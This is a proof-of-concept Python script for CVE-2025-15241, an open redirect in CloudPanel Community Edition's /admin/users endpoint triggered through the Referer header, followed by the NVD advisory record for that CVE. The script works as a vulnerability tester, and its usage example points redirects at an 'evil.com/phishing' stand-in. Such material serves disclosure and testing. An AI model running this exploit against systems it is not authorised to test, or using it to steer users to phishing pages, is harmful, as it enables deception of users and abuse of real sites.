CVE-2025-15241

# CVE-2025-15241 Open Redirect PoC # Affected: CloudPanel Community Edition <= 2.5.1 # Target: /admin/users endpoint import requests import sys def test_open_redirect(target_url, redirect_url): """ Test for open redirect vulnerability in CloudPanel """ # Craft the Referer header with malicious redirect target headers = { 'Referer': redirect_url, 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Target endpoint target = f"{target_url}/admin/users" try: response = requests.get(target, headers=headers, allow_redirects=False) # Check if redirect occurs if response.status_code in [301, 302, 303, 307, 308]: location = response.headers.get('Location', '') if redirect_url in location or location.startswith('http'): print(f"[+] VULNERABLE: Open redirect detected!") print(f"[+] Redirect location: {location}") return True # Also check meta refresh or JavaScript redirects if 'refresh' in response.text.lower() or 'window.location' in response.text.lower(): print(f"[+] VULNERABLE: Client-side redirect detected!") return True except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <malicious_url>") print(f"Example: python {sys.argv[0]} https://vulnerable-site.com https://evil.com/phishing") sys.exit(1) target = sys.argv[1] malicious = sys.argv[2] print(f"[*] Testing {target} for CVE-2025-15241") test_open_redirect(target, malicious)

{"cve": {"id": "CVE-2025-15241", "sourceIdentifier": "[email protected]", "published": "2025-12-30T09:15:52.787", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in CloudPanel Community Edition up to 2.5.1. The affected element is an unknown function of the file /admin/users of the component HTTP Header Handler. Such manipulation of the argument Referer leads to open redirect. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 2.5.2 is sufficient to fix this issue. Upgrading the affected component is recommended."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.5, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-601"}]}], "references": [{"url": "https://github.com/Stolichnayer/cloudpanel-open-redirect", "source": "[email protected]"}, {"url": "https://github.com/Stolichnayer/cloudpanel-open-redirect?tab=readme-ov-file#%EF%B8%8F-steps-to-reproduce", "source": "[email protected]"}, {"url": "https://github.com/cloudpanel-io/cloudpanel-ce/releases/tag/v2.5.2", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.338631", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.338631", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.725543", "source": "[email protected]"}]}}